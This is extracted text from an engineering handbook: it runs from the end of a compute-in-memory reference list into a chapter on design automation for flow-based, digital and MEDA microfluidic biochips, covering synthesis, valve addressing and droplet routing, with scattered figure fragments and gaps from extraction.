Ikegawa S, Mancoff FB, Janesky J, Aggarwal S (2020) Magnetoresistive random access memory:
present and future. IEEE Transactions on Electron Devices 67(4):1407–1419
Imani M, Gupta S, Kim Y, Rosing T (2019) FloatPIM: in-memory acceleration of deep neural
network training with high precision. In: ACM/IEEE 46th annual international symposium on
computer architecture (ISCA)
Jiang H, Peng X, Huang S, Yu S (2020a) CIMAT: a compute-in-memory architecture for on-chip
training based on transpose SRAM arrays. IEEE Trans Comput 69(7):944–954
Jiang H, Huang S, Peng X, Su JW, Chou Y-C, Huang WH, Liu TW, Liu R, Chang MF, Yu S
(2020b) A two-way SRAM array based accelerator for deep neural network on-chip training.
In: ACM/IEEE design automation conference (DAC)
Jiang H, Li W, Huang S, Cosemans S, Catthoor F, Yu S (2021) Analog-to-digital converter design
exploration for compute-in-memory accelerators. IEEE Des Test 39(2):48–55
Jouppi NP et al (2017) In-datacenter performance analysis of a tensor processing unit. In:
ACM/IEEE international symposium on computer architecture (ISCA)
Kawahara A, Azuma R, Ikeda Y, Kawai K, Katoh Y, Tanabe K, Nakamura T, Sumimoto Y, Yamada
N, Nakai N, Sakamoto S, Hayakawa Y, Tsuji K, Yoneda S, Himeno A, Origasa K, Shimakawa
K, Takagi T, Mikawa T, Aono K (2012) An 8Mb multi-layered cross-point ReRAM macro with
443MB/s write throughput. In: IEEE international solid-state circuits conference (ISSCC)
Keckler S, Kunle O, Hofstee P (2009) Multicore processors and systems. Springer, US
Khwa W-S, Chen JJ, Li JF, Si X, Yang EY, Sun X, Liu R, Chen PY, Li Q, Yu S, Chang MF (2018)
A 65nm 4Kb algorithm-dependent computing-in-memory SRAM unit-macro with 2.3ns and
55.8TOPS/W fully parallel product-sum operation for binary DNN edge processors. In: IEEE
international solid-state circuits conference (ISSCC)
Kim T, Lee S (2020) Evolution of phase-change memory for the storage-class memory and beyond.
IEEE Trans Electron Devices 67(4):1394–1406
Kim D, She X, Rahman NM, Chekuri VCK, Mukhopadhyay S (2020) Processing-in-memory-
based on-chip learning with spike-time-dependent plasticity in 65-nm cmos. IEEE Solid-State
Circuits Letters 3:278–281
Li C, Hu M, Li Y, Jiang H, Ge N, Montgomery E, Zhang J, Song W, Dávila N, Graves CE, Li
Z (2018a) Analogue signal and image processing with large memristor crossbars. Nat Electron
1(1):52–59
Li Y, Kim S, Sun X, Solomon P, Gokmen T, Tsai H, Koswatta S, Ren Z, Mo R, Yeh CC, Haensch
W, Leobandung E (2018b) Capacitor-based cross-point array for analog neural network with
record symmetry and linearity. In: IEEE symposium on VLSI technology
Li W, Huang S, Sun X, Jiang H, Yu S (2021) Secure-RRAM: a 40nm 16kb compute-in-
memory macro with reconfigurability, sparsity control, and embedded security. In: IEEE custom
integrated circuits conference (CICC)
Lin MY, Cheng HY, Lin WT, Yang TH, Tseng IC, Yang CL, Hu HW, Chang HS, Li HP, Chang
MF (2018) DL-RSIM: a simulation framework to enable reliable ReRAM-based accelerators
for deep learning. In: IEEE/ACM international conference on computer-aided design (ICCAD)
19 Compute-in-Memory Architecture 685
Liu R, Peng X, Sun X, Khwa WS, Si X, Chen JJ, Li JF, Chang MF, Yu S (2018) Parallelizing SRAM
arrays with customized bit-cell for binary neural networks. In: ACM/IEEE design automation
conference (DAC)
Liu Q, Gao B, Yao P, Wu D, Chen J, Pang Y, Zhang W, Liao Y, Xue CX, Chen WH, Tang J (2020)
A fully integrated analog ReRAM based 78.4 TOPS/W compute-in-memory chip with fully
parallel MAC computing. In: IEEE international solid-state circuits conference (ISSCC)
Long Y, She X, Mukhopadhyay S (2019) Design of reliable DNN accelerator with un-reliable
ReRAM. In: Design, Automation & Test in Europe Conference & Exhibition (DATE)
Lue HT, Hsu PK, Wei ML, Yeh TH, Du PY, Chen WC, Wang KC, Lu CY (2019) Optimal
design methods to transform 3D NAND flash into a high-density, high-bandwidth and low-
power nonvolatile computing in memory (nvCIM) accelerator for deep-learning neural networks
(DNN). In: IEEE international electron devices meeting (IEDM)
Luo Y, Peng X, Hatcher R, Rakshit T, Kittl J, Rodder MS, Seo JS, Yu S (2020) A variation
robust inference engine based on STT-MRAM with parallel read-out. In: IEEE international
symposium on circuits and systems (ISCAS)
Mikolajick T, Schroeder U, Slesazeck S (2020) The past, the present, and the future of ferroelectric
memories. IEEE Transactions on Electron Devices 67(4):1434–1443
Peng X, Huang S, Luo Y, Sun X, Yu S (2019) DNN+NeuroSim: an end-to-end benchmarking
framework for compute-in-memory accelerators with versatile device technologies. In: IEEE
international electron devices meeting (IEDM)
Peng X, Liu R, Yu S (2020) Optimizing weight mapping and data flow for convolutional
neural networks on processing-in-memory architectures. IEEE Trans Circuits Syst I Regul Pap
67(4):1333–1343
Presley RK, Haggard RL (1994) A fixed point implementation of the backpropagation learning
algorithm. In: Proceedings of SOUTHEASTCON
Rastegari M, Ordonez V, Redmon J, Farhadi A (2016) XNOR-net: ImageNet classification using
binary convolutional neural networks. In: European conference on computer vision (ECCV)
Ronen R, Eliahu A, Leitersdorf O, Peled N, Korgaonkar K, Chattopadhyay A, Perach B, Kvatinsky
S (2022) The bitlet model: a parameterized analytical model to compare PIM and CPU systems.
ACM J Emerg Technol Comput Syst 18(2):1–29
Shafiee A, Nag A, Muralimanohar N, Balasubramonian R, Strachan JP, Hu M, Williams RS,
Srikumar V (2016) ISAAC: a convolutional neural network accelerator with in-situ analog
arithmetic in crossbars. In: ACM/IEEE international symposium on computer architecture
(ISCA), vol 44, p 14
Shim W, Yu S (2021) Technological design of 3D NAND based compute-in-memory architecture
for GB-scale deep neural network. IEEE Electron Device Lett 42(2):160–163
Si X et al (2020) A 28nm 64Kb 6T SRAM computing-in-memory macro with 8b MAC operation
for AI edge chips. In: IEEE international solid-state circuits conference (ISSCC)
Simonyan K, Zisserman A (2015) Very deep convolutional networks for large-scale image
recognition. In: International conference on learning representations (ICLR)
Song L, Qian X, Li H, Chen Y (2017) PipeLayer: a pipelined RRAM-based accelerator for
deep learning. In: IEEE international symposium on high performance computer architecture
(HPCA)
Song T, Jung J, Rim W, Kim H, Kim Y, Park C, Do J, Park S, Cho S, Jung H, Kwon B, Choi
H-S, Choi J, Yoon JS (2018) A 7nm FinFET SRAM using EUV lithography with dual write-
driver-assist circuitry for low-voltage applications. In: IEEE international solid-state circuits
conference (ISSCC)
Su JW et al (2020) A 28nm 64kb inference-training two-way transpose multibit 6T SRAM
compute-in-memory macro for AI edge chips. In: IEEE international solid-state circuits
conference (ISSCC)
Sun X, Yu S (2019) Impact of non-ideal characteristics of resistive synaptic devices on implement-
ing convolutional neural networks. IEEE J Emerg Sel Top Circuits Syst 9(3):570–579
Sun X, Wang P, Ni K, Datta S, Yu S (2018) Exploiting hybrid precision for training and inference:
a 2T-1FeFET based analog synaptic weight cell. In: IEEE international electron devices meeting
(IEDM)
686 H. Jiang et al.
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 688
Flow-Based Microfluidic Biochips . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 690
Design Tasks for FBMBs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 691
Design Automation for FBMBs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 693
Synthesis Methods for the Flow Layer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 693
Synthesis Methods for the Control Layer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 696
Synthesis Methods for the Codesign of the Control and Flow Layers . . . . . . . . . . . . . . . . . 699
Digital Microfluidic Biochips . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 701
Technology Platforms and Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 701
Synthesis Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 704
MEDA Biochips . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 707
Hardware Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 708
MEDA Evolution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 711
Synthesis Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 712
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 718
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 719
X. Huang
School of Computer Science, Northwestern Polytechnical University, Xi’an, China
e-mail: [email protected]; [email protected]
T.-C. Liang · Zhanwei Zhong
Department of Electrical and Computer Engineering, Duke University, Durham, NC, USA
e-mail: [email protected]; [email protected]
T.-Y. Ho
Department of Computer Science and Engineering, The Chinese University of Hong Kong, Hong
Kong, China
e-mail: [email protected]; [email protected]
K. Chakrabarty ()
School of Electrical, Computer and Energy Engineering, Arizona State University, Tempe,
AZ, USA
e-mail: [email protected]; [email protected]
Abstract
Keywords
Introduction
For the past few years, commercialization of microfluidics has been one of
the main drivers for researchers developing lab-on-a-chip technology. There is a
tremendous potential for growth in lab-on-a-chip technologies as more discoveries
are made. A summary of the current microfluidic products is presented in Table 1.
Several companies have transitioned microfluidic platforms to the marketplace, each
with different design paradigms and varying degrees of success.
The road toward large-scale integration which microfluidics has taken is very
similar to the early development of integrated circuits. As the available on-
chip resources became unmanageable, CAD tools were introduced to improve
productivity, eventually creating an electronic design automation (EDA) industry
for integrated circuits. For microfluidic biochips, however, this systematic design
automation is yet to come. To realize a complete automation flow for biochip design
and thereby promote the development of an EDA industry for microfluidics, a large
amount of work on the design automation of microfluidic biochips has been carried
out over the past decade (Chakrabarty et al. 2010; Huang et al. 2019a, 2021a,b;
Ibrahim et al. 2018a; Liu et al. 2021; Tseng et al. 2013). With these pioneering
research, on the one hand, design tasks can be offloaded from researchers and
engineers in biology and biochemistry. On the other hand, new chip architectures
are explored automatically to open new doors to designers to meet requirements
from future large-scale biological experiments and medical diagnoses. In this
chapter, the authors describe three prominent microfluidic architectures: flow-based
microfluidic biochips, digital microfluidic biochips, and microelectrode-dot-array
(MEDA) biochips. The authors also describe computer-aided design (CAD) tools
for the automated synthesis and optimization of biochips from bioassay protocols.
Recent advances in modeling and simulation, fluidic-operation scheduling, module
placement, physical design, and dynamic reconfiguration are also presented.
flow control
control port channel channel
membrane
crossing
valve
Fig. 1 (a) Schematic of a flow-based microfluidic biochip, (b) front view of (a), (c) structure of
a rotary mixer, and (d) structure of a fully programmable valve array. (Adopted from Fidalgo and
Maerkl 2011)
20 Design Automation Techniques for Microfluidic Biochips 691
valves are deployed at each flow-channel (wide channels in blue color) crossing,
so that variable interconnections and arbitrary channel structures can be imple-
mented. Correspondingly, biochemical operations can be performed automatically
by opening and closing a set of valves, and bioassays can be completed efficiently
by configuring different functionality modules on this architecture.
As manufacturing technologies advance, the characteristic dimensions of
FBMBs keep shrinking. The feature size of valves has been reduced significantly
from 15×15 μm2 to 6×6 μm2 (Araci and Quake 2012). Tens of thousands of
valves can be integrated into a chip smaller than a coin (Araci and Quake 2012),
and the design of biochips has become much more complex to achieve desired
functions. A 96 × 96 dynamic array developed by Fluidigm Inc., for example,
can run 9,216 parallel polymerase chain reactions (PCR), but it requires more than
25000 valves to realize various fluidic manipulations (Perkel 2008). Consequently,
traditional manual design that suffers from the drawbacks of being time-consuming
and error-prone is not suitable anymore. The lack of CAD tools not only prolongs
the development cycle of microfluidic products but also hinders their large-scale
integration. New challenges are calling for an automatic design and integration
solution.
The automation flow of FBMBs includes several design tasks, e.g., allocating
necessary devices for bioassay execution and chip control, computing exact on-
chip locations for these devices, constructing efficient connections among them,
etc. The results of these tasks determine the chip architecture and thus the final chip
performance. In this section, the authors introduce the design tasks of architectural
synthesis in both control and flow layers.
Fig. 2 Architectural synthesis framework of FBMBs. (Adopted from Yao et al. 2015). (a)
Sequencing graph of PCR, (b) binding and scheduling scheme, (c) placement and routing solution
in the flow layer, (d) positions of valves, (e) valve-addressing solution, and (f) routing solution in
the control layer
• High-level synthesis: The major goals of this stage include: (i) find a binding
solution φ : O → D such that every operation in the sequencing graph is
bound to a specific device to execute and (ii) compute a scheduling scheme
such that all the operations can be completed efficiently while satisfying the
specified dependencies. Fig. 2b shows a binding and scheduling scheme of the
PCR described in Fig. 2a, where 4 mixers are allocated to execute operations.
For example, operations o1 –o4 are bound to devices M1 –M4 , respectively. They
are executed concurrently at the time interval between 0 and t1 . Moreover, the
complete assay is finished at time point t5 after completing the execution of o7
on device M3 .
• Physical design: With the generated binding and scheduling scheme, physical
design is performed to assign the allocated devices to exact locations on the
chip while establishing efficient connections among them. Typical optimization
objectives in this stage include short length of flow channels, small chip area, few
channel crossings, etc. For example, Fig. 2c shows a chip layout corresponding to
the scheduling described in Fig. 2b, where flow ports and waste ports are placed
at the boundary of the chip to inject fluid samples and recover waste fluids,
respectively. In addition, the total length of flow channels and the number of
channel crossings have been minimized to reduce fabrication cost of the chip.
20 Design Automation Techniques for Microfluidic Biochips 693
• Valve addressing: Since the density of valves integrated into a single biochip has
increased significantly over the past decade – up to 1 million valves/cm2 (Araci
and Quake 2012) – this leads to a rapid increase in the number of control ports.
These ports occupy extra chip area and need to be connected to external pressure
sources, thus increasing the fabrication cost and complexity of the control system
significantly. To solve this problem, valve addressing is performed to group
valves that can be actuated in a compatible manner while assigning them a shared
control port. Figure 2d shows the positions of valves in the chip layout described
in Fig. 2c. By computing the switching patterns of these valves at each time step,
the compatibility among them can be identified. In the grouping solution shown
in Fig. 2e, valves that are connected together can be actuated by the same control
port.
• Control-channel routing: With an optimized valve-addressing solution, routing of
control channels is then performed to connect valves in the same group to their
control port. Figure 2f shows the routing result corresponding to Fig. 2e. In this
architecture, control ports are placed at the edges of the control layer to reduce
design complexity. Note that control ports can actually be placed anywhere on
the chip. Optimization goals in this stage typically include short length of control
channels, synchronization of valve actuation, short-pattern setup time of control
signals, etc.
In this section, the corresponding design methods for both control and flow layers
are discussed.
Many design automation methods have recently been proposed for the flow-layer
architectural synthesis of FBMBs (Huang et al. 2019a, 2021a,b; Ibrahim et al.
2018a; Liu et al. 2021; Tseng et al. 2013; Huang et al. 2022). These synthesis tools
adopt various optimization techniques, including integer linear programming (ILP),
particle swarm optimization (PSO), A*-search algorithm, etc., to systematically
solve the problems described in section “Architecture Design of the Flow Layer,”
thus generating biochip architectures with both high efficiency and low cost.
694 X. Huang et al.
heater
flow channel control channel store
dedicated storage
fetch
mixer mixer
heater
cache
storage units channel
storage
fetch
multiplexing structure mixer
(a) (b)
from several limitations, e.g., constrained capacity, fixed position, and large area
occupation. Moreover, the multiplexing structure in Fig. 3a allows only one fluid to
enter/leave the storage at a time, thus limiting its access bandwidth. In contrast,
fluids can be cached directly in flow channels in a channel-storage architecture
as illustrated in Fig. 3b. This can be viewed as distributing the storage units in a
dedicated storage to the chip plane, leading to an “on-the-spot” fluid store/fetch with
higher efficiency. Accordingly, Liu et al. (2021) presents an ILP-based methodology
to automatically generate chip layouts with channel storage. In Huang et al. (2021a),
a fast heuristic is proposed to efficiently compute optimized channel-storage archi-
tectures while removing the contaminants left behind in channels/devices during the
execution of bioassays. In particular, the work in Ibrahim et al. (2018a) presents an
efficient synthesis flow called CoSyn to generate a hybrid microfluidic platform that
enables complete single-cell analysis on a heterogeneous pool of cells.
More recently, a synthesis flow named PathDriver+ has been proposed by taking
the actual fluid manipulations into account (Huang et al. 2021b). For example, when
loading fluid samples into a device, to ensure correct execution of the operation,
the air already present should be completely pushed out of the device. Meanwhile,
the air used for driving the movement of fluids should avoid entering into the
device. This constraint, consequently, requires a strict volume control of input fluids.
Figure 4 describes an example of failure in volume control, where the two fluids
that need to be mixed are separated due to insufficient input volumes. In contrast,
in Fig. 5, volumes of the two input fluids are increased to ensure that no extra
air is kept inside the mixer, leading to excess fluids left behind in flow channels.
Accordingly, PathDriver formulates the constraints above into an ILP model and
constructs flow paths for both fluid transportation and excess fluid removal, leading
to chip architectures with volume management.
Besides the complete synthesis flows above, there are a number of automation
solutions for solving the local optimizations in the flow-layer design (Lin et al.
2014; Yang et al. 2018; Wang et al. 2016; Grimmer et al. 2017; Crites et al. 2017;
Huang et al. 2019b; Li et al. 2016; Lai et al. 2018). For example, the methods
in Lin et al. (2014) and Yang et al. (2018) are proposed to deal specifically with
the channel routing problem, so that the total length of flow channels can be
minimized. Specifically, Lin et al. (2014) adopts the obstacle-avoiding rectilinear
Steiner tree model to construct a flow-channel network with minimized total channel
length. Similar to the X-/octilinear architecture implemented in integrated circuits,
in Yang et al. (2018), the traditional Manhattan channels with 90◦ bends are replaced
by a routing strategy with any-angle bends, thus fundamentally increasing the
routing flexibility. The methods in Wang et al. (2016), Grimmer et al. (2017),
(c) (d)
Fig. 5 Snapshots of fluid manipulations when performing the mixing operation. (Adopted from
Urbanski et al. 2007). (a) Loading the first fluid flow, (b) removing the excess fluids in (a), (c)
loading the second fluid flow and starting the mixing operation, and (d) recovering the resulting
mixture and removing the excess fluids in (c)
Crites et al. (2017), and Huang et al. (2019b) are put forward to find optimized
physical design solutions, so that key indicators such as chip area, channel length,
and channel crossings can be minimized simultaneously. The method in Li et al.
(2016) is proposed to compute optimized binding and scheduling schemes such that
the completion time of bioassays is minimized. The synthesis methods in Lai et al.
(2018) are proposed to solve the dynamic mapping and fluidic routing problems in
FPVA biochips. Moreover, in Tseng et al. (2016), a valve-role-changing concept is
proposed to improve the reliability of FPVA biochips, including the following two
major techniques: (1) valve actuation activities are distributed evenly on the chip,
and (2) the largest number of valve actuations is minimized.
Qualitative comparisons among different flow-layer architecture design methods
are presented in Table 2.
Fig. 6 Structure of a multiplexer with three control channels. (Adopted from Zhu et al. 2019)
20 Design Automation Techniques for Microfluidic Biochips 699
Synthesis Methods for the Codesign of the Control and Flow Layers
As mentioned before, control and flow layers interact with each other through
valves, which therefore implies that the control-layer design is closely related to
the synthesis solution of the flow layer. For example, a chip layout with plenty of
channel crossings gathered in a specific region in the flow layer would harm the
routability of control channels and may even result in design failure of the control
layer. The synthesis methods discussed in sections “Synthesis Methods for the Flow
Layer” and “Synthesis Methods for the Control Layer,” on the other hand, can
700 X. Huang et al.
generate optimized layout solutions for either the control or flow layer, but they
neglect the layer interactions to varying degrees and design each layer separately,
leading to a gap between the two layers. Accordingly, another set of automation
methods that handles the design of control and flow layers jointly has recently been
proposed (Yao et al. 2015; Tseng et al. 2017, 2019).
The work in Yao et al. (2015) puts forward the first flow-control codesign
methodology that seamlessly integrates the design stages in both layers. The core
technique adopted in this method is a placement adjustment algorithm, which
iteratively refines positions of devices in the flow layer based on the feedback
information from control- and flow-layer routing stages. With this iterative feedback
tuning, congestions in both layers can be eliminated, and the overall solution quality
can be improved significantly.
In particular, a co-layout synthesis tool suite named Columba has recently
been proposed to bridge the design gap between control and flow layers (Tseng
et al. 2017, 2019). These tools have received considerable attention in both EDA
and microfluidic communities, due to their advantages in dealing with large-scale
designs within complex layer interactions. Major features of Columba include the
following:
Fig. 7 Design specification of kinase activity application and the corresponding biochip synthe-
sized by Columba. (Adopted from Tseng et al. 2017)
20 Design Automation Techniques for Microfluidic Biochips 701
l l
l
l l
With the proposed Columba tool suite, users with different background only need
to upload a specification at high abstraction level describing their design requests
to the cloud server, and a customized manufacturing-ready design solution will be
returned automatically within minutes.
Fig. 10 (a) Top view of a DMFB (Liang et al. 2020). Two droplets are present on the biochip. (b)
Illustration of the side view of a DMFB. The droplet is moved to the right using EWOD
droplet; this interfacial tension gradient forces the droplet to move toward the right.
A filler medium such as silicone oil is used between the two plates to avoid fluid
evaporation and reduce the likelihood of cross-contamination between samples.
Today’s DMFBs can also be integrated with sensors and intelligent cyberphysical
control (Luo et al. 2012).
Because of the precise control over microfluidic operations, DMFBs are
employed by microbiologists and biomedical engineers to seamlessly process
several biomolecular reaction steps without bulky instrumentation. DMFBs
have been demonstrated to handle complicated applications such as cell
biology (Lamanna et al. 2020), point-of-care diagnostics (Sista et al. 2020), and
air monitoring (Huang et al. 2020). Several examples are described below:
20 Design Automation Techniques for Microfluidic Biochips 703
Fig. 12 DMFB system for the detection of inorganic ions in aerosols (Huang et al. 2020)
Synthesis Methods
Fig. 13 An example illustrating high-level synthesis for a digital microfluidic biochip. (Adopted
from Chakrabarty et al. 2010)
706 X. Huang et al.
Droplet Routing
The problem of determining paths of droplet transportation between modules is
referred to as droplet routing. The dynamic reconfigurability inherent in digital
microfluidics allows different droplet routes to share cells on the microfluidic
array during different time intervals. Several systematic routing methods for digital
microfluidic biochips have therefore been developed to minimize the number of
cells used for droplet routing while satisfying constraints imposed by performance
goals and fluidic properties (Liang et al. 2020; Huang et al. 2009; Su et al. 2006; Xu
and Chakrabarty 2007).
One of the first methods for droplet routing in biochips was proposed in Su
et al. (2006). The main objective in routing is to find droplet routes with minimum
lengths, where route length is measured by the number of cells in the path from the
starting point to the destination. For a microfluidic array of fixed size, minimum-
length droplet routes lead to the minimization of the total number of cells used in
droplet routing, thus freeing up more spare cells for fault tolerance.
Droplet routing should be considered in the synthesis flow for digital microflu-
idics, in order to generate a routable synthesized design for the availability of
routing paths. The work in Xu and Chakrabarty (2007) proposed a method to
incorporate droplet routability in the PRSA-based synthesis flow. This method
estimates the droplet routability using two metrics. It adopts the average module
distance (over all interdependent modules) as the first design metric to guarantee
the routability of modules in the synthesized biochip. It also adopts the maximum
module distance as the second design metric to approximate the maximum length
of droplet manipulation.
20 Design Automation Techniques for Microfluidic Biochips 707
Since synthesis results with high routability values are more likely to lead to
simple and efficient droplet pathways, this method incorporates the above two
metrics into the fitness function by a factor that can be fine-tuned according to
different design specifications to control the PRSA-based procedure. Candidate
designs with low routability are discarded during evolution. Thus, the synthesis
procedure guarantees that the routing complexity is reduced for the synthesized
biochip while meeting constraints on array size and bioassay processing time.
However, the above methods are static, and they neglect the fact that droplet
transportation may fail if the electrodes associated with the routing path degrade
over time. Recently, the work in Liang et al. (2020) proposed a real-time routing
method that can capture the underlying health conditions of electrodes and provide
reliable routing pathways. This work casts droplet transportation as a reinforcement
learning problem. In the RL framework, a deep neural network is first trained
to learn a reliable policy for droplet routing. Next, the network is loaded on a
cyberphysical DMFB, where it can observe the health condition of the electrodes.
The experimental results showed that even though electrodes on a DMFB degrade
over time, the RL droplet router can learn the degradation behavior and transport
droplets using only healthy electrodes. This work increases the lifespan of a
biochip’s utility and allows for the adaptation of a plethora of bioassays on to the
DMFB platform.
MEDA Biochips
Hardware Implementation
On a DMFB device, tiny droplets are manipulated based on the principle of EWOD.
Conventional DMFB generally contains two layers: (1) The bottom layer contains
a two-dimension array of electrodes. (2) The top layer acts as a ground electrode.
Between the droplet and the electrodes in the bottom layer, there is a hydrophobic
layer. If there is a hydrophobic layer between the liquid and the electrode, the contact
angle θ will be smaller when the electrode is activated. A smaller value of θ indicates
a stronger EWOD force; therefore, this hydrophobic layer is used to increase the
EWOD force. To move a droplet, the authors need to apply a high voltage to
an adjacent electrode and deactivate the electrode under the droplet. Because the
droplet will achieve a lower energy on the high-voltage electrode, there is a force
that drags the droplet to the electrode with high voltage. By applying various voltage
patterns on electrodes, droplet splitting, mixing, and dispensing operations can be
implemented.
Compared with conventional DMFB biochips, MEDA biochips offer more
flexibility. A conventional DMFB and a MEDA biochip are illustrated in Fig. 14.
The basic unit of MEDA is a microelectrode cell (MC). It contains a microelectrode,
an activation circuit, and a sensing circuit. A high voltage (HV) of around 25 V is
applied to the top plate of the MEDA biochip (Lai et al. 2015b).
Based on the actuation and sensing circuit under the microelectrode, three MC
functions can be implemented in an MC: droplet dragging, droplet holding, and
droplet sensing. The block diagrams of the actuation and sensing circuit under each
MC are shown in Fig. 15 and described below:
Fig. 14 The construction of (a) a conventional DMFB biochip and (b) the MEDA biochip.
(Adapted from Li et al. 2018)
certain voltage. With a fixed target voltage, the charging time depends on the
capacitance between the top plate and the microelectrode; therefore, the authors
can detect droplet based on the small increment in charging time.
Fig. 15 Illustration of the actuation and sensing circuit under each MC. (Adopted from Lai et al.
2015b)
(c) (d)
Fig. 16 (a) Example illustration; (b) silicone oil position readback; (c) droplet position readback;
(d) 2D scanning image
20 Design Automation Techniques for Microfluidic Biochips 711
MEDA Evolution
Fig. 17 Evolution of MEDA biochips: (a) the first generation (Wang et al. 2011), (b) the second
generation (Lai et al. 2015b), and (c) the third generation (Lai et al. 2015a)
712 X. Huang et al.
ments are as follows: (1) droplet-location sensing is included, and the “2D location
map” is visible in a custom user interface, (2) droplet-property sensing (i.e., dielec-
tric constant) can also be measured with the integrated high-sensitivity capacitance
readout circuit, and (3) the controlling circuit is fully integrated, so this biochip is
fully automated.
The third-generation MEDA biochip was fabricated in 2015; see Fig. 17c. Its
functionality is the same as the second generation, but it significantly improves the
performance of some key building blocks: (1) The on/off state of a microelectrode
is controlled by an MOS switch. The breakdown voltage of the MOS switch is
25 V, while it is only 14.5 V in the second-generation MEDA biochip. With a
higher breakdown voltage, the authors can apply a higher voltage to activate a
microelectrode and manipulate the droplet more efficiently. (2) The droplet-location
sensing circuit achieves a resolution of 1.3 fF, while the resolution is only 5 fF in
the second generation. According to the analysis and experimental results reported
in Lai et al. (2015a), the third-generation MEDA biochip achieves over 40%
improvement in power consumption and operation time compared to the second-
generation biochip.
Synthesis Methods
In this section, the authors describe the recent synthesis work specific for MEDA
biochips.
Reservoir Placement
Reservoir Placer
Router O3
O6 O4 O1 Scheduler
Operation Queue
Fig. 18 Unified synthesis flow for MEDA biochips (Li et al. 2017)
Top Plate
Ground
FC Electrode
v FEWOD Ff
H Droplet Fd Hydrophobic Layer
Dielectric Layer
Electrode
2r (a) Bottom Plate
Contact A(x)
Line
L x Actuated
Droplet Microelectrodes
(b)
Fig. 19 A droplet undergoing transport on a MEDA biochip: (a) side view and (b) top view
(Li et al. 2017)
Fig. 20 Illustration of the module reshaping during placement (Chung et al. 2018)
Step 1
Di 1 2 3 4 Dj Di Dj
Step 2 Step 3
Di Dj
Step 1 Dj
Dj
Di 1 2 3 Di
4
Illustration Camera View
Step 2 Step 3
Dj
Di
Chen et al. (2011) also incorporated other MEDA-specific characteristics, e.g., diag-
onal movements and channel-based movements. The work in Howladar et al. (2016)
proposed a MEDA-based cross-reference driving scheme and routing algorithm that
allow simultaneous driving of multiple droplets. The objectives of these methods
include reducing the crossovers with intelligent collision avoidance, minimizing
the overall routing time, and minimization of the control pin count. The work in
Li et al. (2017) also proposed a modified Lee-based routing algorithm specific for
MEDA biochips. A typical Lee algorithm includes four steps: initialization, wave
propagation, backtrace, and clearance. Initialization aims to create routing grids and
identify the source and the sink. The next step, wave propagation, progressively fills
the adjacent grids with marks based on the distance of the wave front from the source
to the sink. Based on the tracing information, backtrace determines the shortest path
from the sink to the source. The last step, clearance, deletes all marks and preserves
20 Design Automation Techniques for Microfluidic Biochips 717
the shortest path. In Li et al. (2017), the Lee algorithm is adopted to consider the
size and shape of different droplets on a MEDA biochip. In order to incorporate the
diagonal droplet transportation (Wang et al. 2011), the distance “wave” can also be
propagated diagonally. Note that the droplet shape can be modified during droplet
transportation (Wang et al. 2011). Droplet shape morphing during droplet routing
is used for avoiding conflict with other droplets or executing fluidic modules; the
droplet shape can be restored when there is no conflict. Therefore, droplet shapes
as well as the relative distance should be recorded in the step of wave propagation.
After the wave propagation is completed, the authors can back trace the shortest
droplet route from the sink to the source.
The work in Lu et al. (2018) proposed a multi-level hierarchical approach that
can take appropriate decisions on droplet splitting and reshaping. Figure 23 shows
the overview of the proposed algorithm, which includes a top-down uncoarsening
followed by a bottom-up coarsening. In the uncoarsening stage, a non-splitting
reshaping-driven detailed routing (NRDR) algorithm was proposed to reshape
droplets during droplet transportation. The reshaping decisions are guided by a
proposed global droplet router. In the coarsening stage, an algorithm based on
bipartite matching was proposed to select the best splitting type to split the droplets
that are filed in the uncoarsening stage.
The work in Keszocze et al. (2017) proposed the first exact droplet routing
technique that is capable of handling various MEDA-specific routing characteristics,
such as droplet morphing and diagonal droplet transportation. At the same time, the
optimal routing results can be guaranteed. The proposed method transformed the
considered routing problem into a sequence of decision problems. Each decision
problem is then symbolically formulated as a SAT Module Theories (SMT) instance
which, afterward, is passed to a SAT solver. Satisfiability (SAT) is a fundamental
718 X. Huang et al.
Conclusion
References
10xgenomics (2020). https://www.10xgenomics.com/, last accessed: August 11, 2020
Araci IE, Quake SR (2012) Microfluidic very large scale integration (mVLSI) with integrated
micromechanical valves. Lab Chip 12(16):2803–2806
Chakrabarty K, Fair RB, Zeng J (2010) Design tools for digital microfluidic biochips: toward
functional diversification and more than moore. IEEE Trans Comput-Aided Des Integr Circuits
Syst 29(7):1001–1017
Chen Z, Teng DH-Y, Wang GC-J, Fan S-K (2011) Droplet routing in high-level synthesis of
configurable digital microfluidic biochips based on microelectrode dot array architecture.
BioChip J 5(4):343–352
Chen Y-H, Hsu C-L, Tsai L-C, Huang T-W, Ho T-Y (2013) A reliability-oriented placement
algorithm for reconfigurable digital microfluidic biochips using 3-D deferred decision making
technique. IEEE Trans Comput-Aided Des Integr Circuits Syst 32(8):1151–1162
Cho M, Pan DZ (2008) A high-performance droplet routing algorithm for digital microfluidic
biochips. IEEE Trans Comput-Aided Des Integr Circuits Syst (TCAD) 27(10):1714–1724
Chung W-C, Cheng P-Y, Li Z, Ho T-Y (2018) Module placement under completion time
